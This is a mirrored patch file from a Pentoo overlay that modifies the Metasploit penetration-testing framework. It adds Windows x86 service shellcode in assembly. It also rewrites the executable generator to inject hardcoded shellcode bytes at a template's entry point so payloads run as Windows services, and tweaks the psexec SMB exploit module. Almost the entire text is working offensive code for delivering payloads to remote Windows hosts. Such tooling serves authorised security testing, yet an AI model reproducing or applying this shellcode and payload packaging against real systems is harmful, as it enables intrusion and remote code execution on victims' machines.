mirror of
https://github.com/pentoo/pentoo-overlay
synced 2025-12-16 05:12:38 +01:00
219 lines
8.9 KiB
Diff
219 lines
8.9 KiB
Diff
diff -Naur metasploit-9999.orig/external/source/shellcode/windows/x86/src/block/block_service.asm metasploit-9999/external/source/shellcode/windows/x86/src/block/block_service.asm
|
|
--- metasploit-9999.orig/external/source/shellcode/windows/x86/src/block/block_service.asm 1970-01-01 01:00:00.000000000 +0100
|
|
+++ metasploit-9999/external/source/shellcode/windows/x86/src/block/block_service.asm 2013-11-20 11:50:48.256366095 +0100
|
|
@@ -0,0 +1,64 @@
|
|
+;-----------------------------------------------------------------------------;
|
|
+; Author: agix (florian.gaultier[at]gmail[dot]com)
|
|
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
|
+; Size: 137 bytes
|
|
+;-----------------------------------------------------------------------------;
|
|
+
|
|
+[BITS 32]
|
|
+; Input: EBP must be the address of 'api_call'.
|
|
+
|
|
+push byte 0x0
|
|
+push 0x32336970
|
|
+push 0x61766461
|
|
+push esp
|
|
+push 0x726774c
|
|
+call ebp ;load advapi32.dll
|
|
+push 0x00454349
|
|
+push 0x56524553
|
|
+mov ecx, esp ;ServiceTableEntry.SVCNAME
|
|
+lea eax, [ebp+0xd0];ServiceTableEntry.SvcMain
|
|
+push 0x00000000
|
|
+push eax
|
|
+push ecx
|
|
+mov eax,esp
|
|
+push 0x00000000
|
|
+push eax
|
|
+push 0xCB72F7FA
|
|
+call ebp ;call StartServiceCtrlDispatcherA(ServiceTableEntry)
|
|
+push 0x00000000
|
|
+push 0x56A2B5F0
|
|
+call ebp ;call ExitProcess(0)
|
|
+pop eax ;SvcCtrlHandler
|
|
+pop eax
|
|
+pop eax
|
|
+pop eax
|
|
+xor eax,eax
|
|
+ret
|
|
+cld ;SvcMain
|
|
+call me
|
|
+me:
|
|
+pop ebp
|
|
+sub ebp, 0xd6 ;ebp => hashFunction
|
|
+push 0x00464349
|
|
+push 0x56524553
|
|
+mov ecx, esp ;SVCNAME
|
|
+lea eax, [ebp+0xc9];SvcCtrlHandler
|
|
+push 0x00000000
|
|
+push eax
|
|
+push ecx
|
|
+push 0x5244AA0B
|
|
+call ebp ;RegisterServiceCtrlHandlerExA
|
|
+push 0x00000000
|
|
+push 0x00000000
|
|
+push 0x00000000
|
|
+push 0x00000000
|
|
+push 0x00000000
|
|
+push 0x00000000
|
|
+push 0x00000004
|
|
+push 0x00000010
|
|
+mov ecx, esp
|
|
+push 0x00000000
|
|
+push ecx
|
|
+push eax
|
|
+push 0x7D3755C6
|
|
+call ebp ;SetServiceStatus RUNNING
|
|
\ No newline at end of file
|
|
diff -Naur metasploit-9999.orig/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm metasploit-9999/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm
|
|
--- metasploit-9999.orig/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm 1970-01-01 01:00:00.000000000 +0100
|
|
+++ metasploit-9999/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm 2013-11-20 11:50:48.256366095 +0100
|
|
@@ -0,0 +1,17 @@
|
|
+;-----------------------------------------------------------------------------;
|
|
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
|
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
|
+; Version: 1.0 (28 July 2009)
|
|
+; Size: 189 bytes + strlen(libpath) + 1
|
|
+; Build: >build.py single_service_stuff
|
|
+;-----------------------------------------------------------------------------;
|
|
+
|
|
+[BITS 32]
|
|
+[ORG 0]
|
|
+
|
|
+ cld ; Clear the direction flag.
|
|
+ call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
|
+%include "./src/block/block_api.asm"
|
|
+start: ;
|
|
+ pop ebp ; pop off the address of 'api_call' for calling later.
|
|
+%include "./src/block/block_service.asm"
|
|
\ No newline at end of file
|
|
diff -Naur metasploit-9999.orig/lib/msf/util/exe.rb metasploit-9999/lib/msf/util/exe.rb
|
|
--- metasploit-9999.orig/lib/msf/util/exe.rb 2013-11-20 11:50:31.748365346 +0100
|
|
+++ metasploit-9999/lib/msf/util/exe.rb 2013-11-20 11:50:48.256366095 +0100
|
|
@@ -402,36 +402,86 @@
|
|
|
|
case opts[:exe_type]
|
|
when :service_exe
|
|
+ exe = Rex::PeParsey::Pe.new_from_file(opts[:template], true)
|
|
max_length = 8192
|
|
name = opts[:servicename]
|
|
|
|
- if name
|
|
- bo = pe.index('SERVICENAME')
|
|
- raise RuntimeError, "Invalid PE Service EXE template: missing \"SERVICENAME\" tag" if not bo
|
|
- pe[bo, 11] = [name].pack('a11')
|
|
+ if not name
|
|
+ name = Rex::Text.rand_text_alpha(7)
|
|
end
|
|
-
|
|
- if not opts[:sub_method]
|
|
- pe[136, 4] = [rand(0x100000000)].pack('V')
|
|
+ #code_service could be encoded in the future
|
|
+ code_service =
|
|
+ "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
|
+ "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
|
+ "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
|
+ "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
|
+ "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
|
+ "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
|
+ "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
|
+ "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
|
+ "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
|
+ "\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" +
|
|
+ "\x26\x07\xFF\xD5\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1" +
|
|
+ "\x8D\x85\xD0\x00\x00\x00\x6A\x00\x50\x51\x89\xE0\x6A\x00\x50\x68" +
|
|
+ "\xFA\xF7\x72\xCB\xFF\xD5\x6A\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x58" +
|
|
+ "\x58\x58\x58\x31\xC0\xC3\xFC\xE8\x00\x00\x00\x00\x5D\x81\xED\xD6" +
|
|
+ "\x00\x00\x00\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1\x8D" +
|
|
+ "\x85\xC9\x00\x00\x00\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" +
|
|
+ "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" +
|
|
+ "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5"
|
|
+
|
|
+ pe_header_size=0x18
|
|
+ section_size=0x28
|
|
+ characteristics_offset=0x24
|
|
+ virtualAddress_offset=0xc
|
|
+ sizeOfRawData_offset=0x10
|
|
+
|
|
+ sections_table_rva = exe._dos_header.v['e_lfanew']+exe._file_header.v['SizeOfOptionalHeader']+pe_header_size
|
|
+ sections_table_offset = exe.rva_to_file_offset(sections_table_rva)
|
|
+ sections_table_characteristics_offset = exe.rva_to_file_offset(sections_table_rva+characteristics_offset)
|
|
+
|
|
+ sections_header = []
|
|
+ exe._file_header.v['NumberOfSections'].times { |i|
|
|
+ sections_header << [sections_table_characteristics_offset+(i*section_size),pe[sections_table_offset+(i*section_size),section_size]]
|
|
+ }
|
|
+
|
|
+ #look for section with entry point
|
|
+ sections_header.each do |sec|
|
|
+ virtualAddress = sec[1][virtualAddress_offset,0x4].unpack('L')[0]
|
|
+ sizeOfRawData = sec[1][sizeOfRawData_offset,0x4].unpack('L')[0]
|
|
+ characteristics = sec[1][characteristics_offset,0x4].unpack('L')[0]
|
|
+ if exe.hdr.opt.AddressOfEntryPoint >= virtualAddress && exe.hdr.opt.AddressOfEntryPoint < virtualAddress+sizeOfRawData
|
|
+ #put this section writable
|
|
+ characteristics|=0x80000000
|
|
+ newcharacteristics = [characteristics].pack('L')
|
|
+ pe[sec[0],newcharacteristics.length]=newcharacteristics
|
|
+ end
|
|
end
|
|
+
|
|
+ #put the shellcode at the entry point, overwriting template
|
|
+ pe[exe.rva_to_file_offset(exe.hdr.opt.AddressOfEntryPoint),code_service.length+code.length]=code_service+code
|
|
+
|
|
when :dll
|
|
max_length = 2048
|
|
when :exe_sub
|
|
max_length = 4096
|
|
end
|
|
|
|
- bo = pe.index('PAYLOAD:')
|
|
- raise RuntimeError, "Invalid PE EXE subst template: missing \"PAYLOAD:\" tag" if not bo
|
|
+ if opts[:exe_type] != :service_exe
|
|
|
|
- if (code.length <= max_length)
|
|
- pe[bo, code.length] = [code].pack("a*")
|
|
- else
|
|
- raise RuntimeError, "The EXE generator now has a max size of #{max_length} bytes, please fix the calling module"
|
|
- end
|
|
+ bo = pe.index('PAYLOAD:')
|
|
+ raise RuntimeError, "Invalid PE EXE subst template: missing \"PAYLOAD:\" tag" if not bo
|
|
|
|
- if opts[:exe_type] == :dll
|
|
- mt = pe.index('MUTEX!!!')
|
|
- pe[mt,8] = Rex::Text.rand_text_alpha(8) if mt
|
|
+ if (code.length <= max_length)
|
|
+ pe[bo, code.length] = [code].pack("a*")
|
|
+ else
|
|
+ raise RuntimeError, "The EXE generator now has a max size of #{max_length} bytes, please fix the calling module"
|
|
+ end
|
|
+
|
|
+ if opts[:exe_type] == :dll
|
|
+ mt = pe.index('MUTEX!!!')
|
|
+ pe[mt,8] = Rex::Text.rand_text_alpha(8) if mt
|
|
+ end
|
|
end
|
|
|
|
return pe
|
|
@@ -463,7 +513,7 @@
|
|
|
|
def self.to_win32pe_service(framework, code, opts={})
|
|
# Allow the user to specify their own service EXE template
|
|
- set_template_default(opts, "template_x86_windows_svc.exe")
|
|
+ set_template_default(opts, "template_x86_windows.exe")
|
|
opts[:exe_type] = :service_exe
|
|
exe_sub_method(code,opts)
|
|
end
|
|
diff -Naur metasploit-9999.orig/modules/exploits/windows/smb/psexec.rb metasploit-9999/modules/exploits/windows/smb/psexec.rb
|
|
--- metasploit-9999.orig/modules/exploits/windows/smb/psexec.rb 2013-11-20 11:50:31.988365357 +0100
|
|
+++ metasploit-9999/modules/exploits/windows/smb/psexec.rb 2013-11-20 11:50:48.256366095 +0100
|
|
@@ -153,7 +153,7 @@
|
|
# Disconnect from the ADMIN$
|
|
simple.disconnect("ADMIN$")
|
|
else
|
|
- servicename = rand_text_alpha(8)
|
|
+ servicename = rand_text_alpha(7)
|
|
|
|
# Upload the shellcode to a file
|
|
print_status("Uploading payload...")
|